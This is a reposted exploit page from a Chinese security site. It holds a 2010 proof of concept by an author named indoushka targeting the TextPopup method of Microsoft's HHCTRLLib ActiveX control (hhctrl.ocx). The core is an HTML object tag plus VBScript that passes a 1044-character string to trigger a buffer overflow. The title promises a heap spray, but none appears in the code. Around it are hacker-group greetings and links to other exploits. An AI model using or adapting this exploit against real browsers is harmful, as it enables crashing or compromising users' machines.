HHCTRLLib (hhctrl.ocx) Remote BOF Exploit (heap spray)

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

HHCTRLLib (hhctrl.ocx) Remote BOF Exploit (heap spray)

来源：www.sec4ever.net 作者：indoushka 发布时间：2010-08-20

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __ /'__`\        /\ \__ /'__`\                   0
0 /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \ _ ___           1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0 [+] Site            : Inj3ct0r.com                                  0
1 [+] Support e-mail : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

########################################################################

# Vendor: Microsoft

# Date: 2010-05-27

# Author : indoushka

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !

# Contact : 00213771818860

# Home : www.sec4ever.net

# Bug : BOF

# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0)
########################################################################

# Exploit By indoushka
----------------------------------about---------------------------------
Loaded File: D:\Dll Ocx\ocx\hhctrl.ocx
Name:        HHCTRLLib
Lib GUID:    {ADB880A2-D8FF-11CF-9377-00AA003B7A11}
Version:     4.0
Lib Classes: 3
------------------------------------------------------------------------

<object classid='clsid:52A2AAAE-085D-4187-97EA-8C30DB990436' id='target' />
<script language='vbscript'>

targetFile = "C:\WINDOWS\system32\hhctrl.ocx"
prototype = "Sub TextPopup (

                         ByVal pszText As String,
                         ByVal pszFont As String,
                         ByVal horzMargins As Long,
                         ByVal vertMargins As Long,
                         ByVal clrForeground As Long,
                         ByVal clrBackground As Long

                        )"
memberName = "TextPopup"
progid     = "HHCTRLLib.HHCtrl"
argCount   = 6

arg1=String(1044, "A")
arg2="defaultV"
arg3="defaultV"
arg4="defaultV"
arg5="defaultV"
arg6="defaultV"

target.TextPopup arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6

</script>

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH
---------------------------------------------------------------------------------------------------------------------------------

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告